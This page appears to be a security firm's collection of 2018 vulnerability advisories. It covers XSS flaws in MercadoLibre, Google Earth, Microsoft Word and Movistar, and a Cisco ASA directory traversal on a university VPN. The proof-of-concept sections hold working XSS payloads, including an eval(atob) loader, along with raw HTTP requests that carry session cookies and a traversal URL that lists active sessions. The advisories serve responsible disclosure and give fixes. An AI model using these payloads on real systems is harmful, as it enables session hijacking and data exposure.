← Advisories 2017    

 

Advisories 2018

2018-001: XSS Reflected in Mercadolibre

Original release date: June 8th, 2018
Last revised: June 25th, 2018
Discovered by: Gonzalo Carrasco
Severity: 6.1/10 (CVSSv3 Base Score)

BACKGROUND

MercadoLibre is an Argentine company dedicated to purchases among registered users of its shopping, sales and Internet payments service. It has operations in each country of origin such as Bolivia, Brazil, Chile, Colombia, Costa Rica, Ecuador, Guatemala, Mexico, Nicaragua, Panama, Peru, Paraguay, Salvador, Dominican Republic, Uruguay, Honduras and Venezuela.

Users can sell and / or auction both new and used products at a fixed or variable price private services are also offered.

DESCRIPTION

The application allows injection of JavaScript code reflecting it towards the user, allowing an attacker to simply send a malicious URL to his victim and obtain his session cookies, for example.

PROOF OF CONCEPT

The vulnerable parameter is "q" and the exploitation is through GET method.
The attach works with the parameter "type" set in:
* type=recent
* type=archived

Example:

https://myaccount.mercadolibre.com.ar/sales/list#type=recent&q="><svg/onload=alert(8)>


Request:

GET /sales/cartSearch?type=recent&q="><svg/onload=alert(8)> HTTP/1.1
Host: myaccount.mercadolibre.com.ar
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://myaccount.mercadolibre.com.ar/sales/list
X-NewRelic-ID: XQ4OVF5VGwIIUFZQAQUB
X-Requested-With: XMLHttpRequest


Response:

<form data-component="actions-search" class="form-search" onsubmit="return false;">
			<div id="iePlaceHolder" class="ie-place-holder">Comprador o venta</div>
			<input type="text" id="search" name="search" class="txt-search" placeholder="Comprador o venta" value=""> 
			<svg/onload=alert(8)>
			<input type="button" id="searchBtn" value="Buscar" class="ch-btn-skin ch-btn-small">
</form>

We can see how the server does not filter the special characters correctly, which allows a malicious user to inject arbitrary code. The "svg" tag entered is embedded within the response of the server, allowing the exploitation of this vulnerability.

DEMO: https://youtu.be/ugiNFsPJ85k

BUSINESS IMPACT

The effects of the discovered vulnerability are raised to a medium-critical level, depending on the interaction that is achieved with the victim user and their status, since if at the time of the attack, the user has an active session with his Mercadolibre account, your current cookies could be captured.

SYSTEMS AFFECTED

MercadoLibre website (vulnerable until June 13th, 2018).

SOLUTION

Preventing XSS requires separation of untrusted data from active browser content:

  • The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the OWASP XSS Prevention Cheat Sheet for details on the required data escaping techniques.
  • Positive or whitelist server-side input validation is also recommended as it helps protect against XSS, but is not a complete defense as many applications require special characters in their input. Such validation should, as much as possible, validate the length, characters, format, and business rules on that data before accepting the input.
  • For rich content, consider auto-sanitization libraries like OWASPs AntiSamy or the Java HTML Sanitizer Project.
  • Consider Content Security Policy (CSP) to defend against XSS across your entire site.


Reference: XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

REFERENCES

https://www.mercadolibre.com

CREDITS

This vulnerability has been discovered by Gonzalo Carrasco (pgcarrasco <at> isecauditors.com).

REVISION HISTORY

June 8th, 2018: Initial release

DISCLOSURE TIMELINE

June  8th, 2018: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
June  8th, 2018: Contact with MercadoLibre.
June  8th, 2018: Answer from MercadoLibre.
June 13th, 2018: Vulnerability corrected by MercadoLibre.
June 25th, 2018: Advisory published.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain and Colombia based company leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.


2018-002: (Blind) Stored XSS on earth.google.com

Original release date: 2018 February 2nd
Last revised: 2018 August 2nd
Discovered by: Fabian Cuchietti

BACKGROUND

Google Earth is a online application that renders a 3D representation of Earth based on satellite imagery.

DESCRIPTION

These vulnerabilities allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's computer, and it is stored into the victim application.

PROOF OF CONCEPT

1) Go to http://earth.google.com/web
2) Go to My Places
3) Click on Import KMZ file
4) Select our file that contains the attack vector i.e: xss.kml, and upload it.
4.1) Payload: "><img src=x id=payload-base64 onerror=eval(atob(this.id))>
5) Click on Save
6) Preview
7) The XSS is reflected in the third-party application used for this XSS, in my case, i used XSSHUNTER.

 
BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's computer, this can leverage to steal sensitive information as user credentials, personal data, etc.

SYSTEMS AFFECTED

Current earth.google.com web application.

SOLUTION

Proper input validations.

REFERENCES

https://earth.google.com/

CREDITS

This vulnerability has been discovered by Fabián Cuchietti (ofcuchietti (at) isecauditors (dot) com).

REVISION HISTORY

Feb 02, 2018 : Initial advisory
Aug 02, 2018 : Update for disclosure

DISCLOSURE TIMELINE

Feb 02, 2018 : Vulnerability acquired by Internet Security Auditors
Feb 02, 2018 : Contact with Google Security Team
Feb 02, 2018 : Google feedback (won't fix)
Aug 02, 2018 : Vulnerability Disclosure

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain and Colombia based company leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.


2018-003: Stored XSS on M‏icrosoft Word (office 365)

Discovered by: Fabian Cuchietti

BACKGROUND

Microsoft Word is a computer program aimed at word processing. It was created by the Microsoft company, and is integrated by default in the office suite called Microsoft Office.

DESCRIPTION

These vulnerabilities allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's computer, and it is stored into the victim application.

PROOF OF CONCEPT
  1. Open Microsoft Office Word
  2. In the menu, we click on the category "Insert"
  3. Click on Video Online
  4. A popup window will open
  5. From code to insert video, here we insert our attack vector: ">Click here
  6. The XSS will executed successfully
 
BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's computer, this can leverage to steal sensitive information as user credentials, personal data, etc.

SYSTEMS AFFECTED

https://www.microsoft.com/en-us/store/b/office365

SOLUTION

Preventing XSS requires separation of untrusted data from active browser content:

The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the OWASP XSS Prevention Cheat Sheet for details on the required data escaping techniques.
Positive or whitelist server-side input validation is also recommended as it helps protect against XSS, but is not a complete defense as many applications require special characters in their input. Such validation should, as much as possible, validate the length, characters, format, and business rules on that data before accepting the input.
For rich content, consider auto-sanitization libraries like OWASPs AntiSamy or the Java HTML Sanitizer Project.
Consider Content Security Policy (CSP) to defend against XSS across your entire site.

REFERENCES

Consult these external references for further information:
http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

CREDITS

This vulnerability has been discovered by Fabián Cuchietti (ofcuchietti (at) isecauditors (dot) com).

REVISION HISTORY

Feb 02, 2018

DISCLOSURE TIMELINE

Jun 16, 2018 : Vulnerability acquired by Internet Security Auditors
Jun 16, 2018 : Contact with Microsoft Security Team
Jun 20, 2018 : Microsoft feedback
Jul 07, 2018 : Vulnerability Disclosure

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain and Colombia based company leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.


 

2018-004: Traversal Directory en VPN de la UAM (Universidad Autónoma de Madrid)

Original release date: 09/08/2018
Last revised: 09/08/2018
Discovered by: Jorge Lajara
Severity: 5.0 CVSSv2 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

VULNERABILITY

A vulnerability (CVE-2018-0296) in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques.

BACKGROUND

The Remote Access Service (VPN) of the UAM (Universidad Autónoma de Madrid) is vulnerable to CVE-2018-0296.

DESCRIPTION

The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic.

PROOF OF CONCEPT
  1. Navigate to https://vpn.uam.es/+CSCOE+/logon.html#form_title_text
  2. Do a Request to https://vpn.uam.es/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/ to list active sessions.
  3. Check the response.
 
BUSINESS IMPACT

An attacker can cause a denial of service or optain arbitrary information through directory traversal techniques.

SYSTEMS AFFECTED

https://vpn.uam.es/+CSCOE+/logon.html#form_title_text

REFERENCES

Consult these external references for further information:
http://www.isecauditors.com
https://www.owasp.org/index.php/Path_Traversal
https://www.cvedetails.com/cve-details.php?t=1&cve_id=CVE-2018-0296#meta...

CREDITS

This vulnerability has been discovered by Jorge Lajara (jlajara (at) isecauditors (dot) com).

REVISION HISTORY

09/08/2018 : Initial release

DISCLOSURE TIMELINE

27/07/2018 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
27/07/2018 : Contact with UAM Security Team.
07/08/2018 : Vulnerability fixed by UAM Security Team.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain and Colombia based company leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.


 

2018-005: Cross Site Scripting (XSS Reflected) in Movistar

Original release date: 19/07/2018
Last revised: 26/10/2018
Discovered by: Gonzalo Carrasco
Severity: 4.7/10 (CVSSv3 Base Score)

VULNERABILITY

Cross Site Scripting (XSS Reflected) in Movistar

BACKGROUND

Movistar is the commercial brand of the Spanish telecommunications multinational Telefónica in Spain and Hispano-America, since May 1, 2010, for its fixed telephony, mobile, internet and television products. The "www.movistar.es" platform provides services to all its customers in a comfortable and fast way.

DESCRIPTION

The application accept it injection of JavaScript code reflecting it towards the user, allowing an attacker to simply send a malicious URL to his victim and obtain his session cookies, for example.

PROOF OF CONCEPT
The vulnerable parameters are "xxxtipouserxxx", "xxxuserxxx" and "xxxpasswordxxx", and the exploitation is through GET method.
 
Example:
-- REQUEST:
GET /sr/sso/pub/servlet/login?tipoUs=P&xxxtypeUserxxx=titular&xxxmethodxxx=post&xxxurixxx=https%3A%2F%2Fwww.movistar.es%2Fmimovistar-cliente%2Fes-es%2Fparticulares%2FpostLogin.html&xxxuserxxx=123456789&xxxpasswordxxx=aSD1231&xxxtipouserxxx=P"><script>prompt(1)</script> HTTP/1.1
Host: www.movistar.es
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.movistar.es/mimovistar-cliente/es-es/particulares/login.html?ccliTokenSS=164adac9f5a559
Cookie: utag_main=v_id:0163bd2d2ba00013f7057242907404044007100900bd0$_sn:3$_ss:0$_st:1531923930124$_pn:24%3Bexp-session$ses_id:1531921591410%3Bexp-session; CSI_clicks_acum_particulares=0; TLTSID=fs2id47fzyq1527887245416; CSI_ultima_particulares=1527887249216; CSI_url_inicio_particulares=/t5/Ayuda-Gestiones-Contratos-y-Factura-Internet/dynamicip-rima-tde-net/td-p/3086562; CSI_page_name_inicio_particulares=comunidad%3Aportada%3Aforos%3Ainternet%3Aayuda-tarifas%3A.dynamicip.rima-tde.net; _ga=GA1.2.370576869.1527887249; JSESSIONID=tvN0bP2Lz7Vb8LY6h3mN2h2621vNFvnrxvfBh7wY2xXY7lVwT0dS!905856882; 7a5f68f5df444a4f87157280100000f7=en; USER_CLASS=519150693; COL=18071809964270AHOGes00002018071877777; SEG_NAV=particulares; SEG_NAV_ES=particulares; MI_MOVISTAR=NABAGNLNN; _gid=GA1.2.168189848.1531917965; __utma=151739813.370576869.1527887249.1531917965.1531921565.2; __utmc=151739813; __utmz=151739813.1531921565.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __mc=-4526385577924454000; _mc_uuid=118218df-d4ed-47d1-ad5c-57dda7321439; _mc_sessorigin=seo; _mc_sessid=1531917965470; IC_XCOL=; IC_XCOL_1=; gwIsp_i3=mov; gwIsp_i3_d=mov; optimizelyEndUserId=oeu1531917967732r0.5122833511510013; optimizelySegments=%7B%7D; optimizelyBuckets=%7B%7D; compruebaCkE=1; TS866899=e7efedca1d13dfc670d7bd1158242e7aadf07615246704f85b4f449b; check=true; mbox=PC#56aaa47249c843fd84f693af4a3ecfb8.26_16#1595162840|session#3e5366681fb742b7aec35779677e69bf#1531923989; gwIsp=mov; __utmb=151739813.4.9.1531921718694; woid=19d4d5c4-2028-97a7-9ea6-940257cd65f0; CCLIJSESSIONID=sf1zbPGXdf0Tp9bmD77RTf7ndJhpNpj2lzylJ0ztVvV3JS2KG4K2!-624340416; AMP_TOKEN=%24NOT_FOUND; _gat_tealium_0=1; _gat=1
-- RESPONSE:
HTTP/1.1 200 OK
Server: XXXXXX
Content-Length: 2920
X-ORACLE-DMS-ECID: 3cfcdc11-88a2-4d98-bb23-b5f86b7a6d30-00b80194
X-ORACLE-DMS-RID: 0
Content-Type: text/html; charset=ISO-8859-1
Connection: close
<input name="xxxtipouserxxx" value="P"><script>prompt(1)</script>" type="hidden">
BUSINESS IMPACT

The effects of the discovered vulnerability are raised to a medium-critical level, depending on the interaction that is achieved with the victim user and their status, since if at the time of the attack, the user has an active session with his Movistar account, your current cookies could be captured.

SYSTEMS AFFECTED

Movistar website

SOLUTION

Preventing XSS requires separation of untrusted data from active browser content:

The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the OWASP XSS Prevention Cheat Sheet for details on the required data escaping techniques.

Positive or whitelist server-side input validation is also recommended as it helps protect against XSS, but is not a complete defense as many applications require special characters in their input. Such validation should, as much as possible, validate the length, characters, format, and business rules on that data before accepting the input.

For rich content, consider auto-sanitization libraries like OWASPs AntiSamy or the Java HTML Sanitizer Project.

Consider Content Security Policy (CSP) to defend against XSS across your entire site.

REFERENCES

https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

CREDITS

This vulnerability has been discovered by Gonzalo Carrasco (pgcarrasco (at) isecauditors (dot) com).

REVISION HISTORY

19/07/2018 : Initial release
26/10/2018: Final release.

DISCLOSURE TIMELINE

July 19th, 2018: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
July 20th, 2018: Contact with Movistar.
July 20th, 2018: Answer from Movistar.
August 16th, 2018: Vulnerability corrected by Movistar, but don't confirmed yet.
August 29th, 2018: Vulnerability confirmed by Movistar.
October 26th, 2018: Advisory published.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain and Colombia based company leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.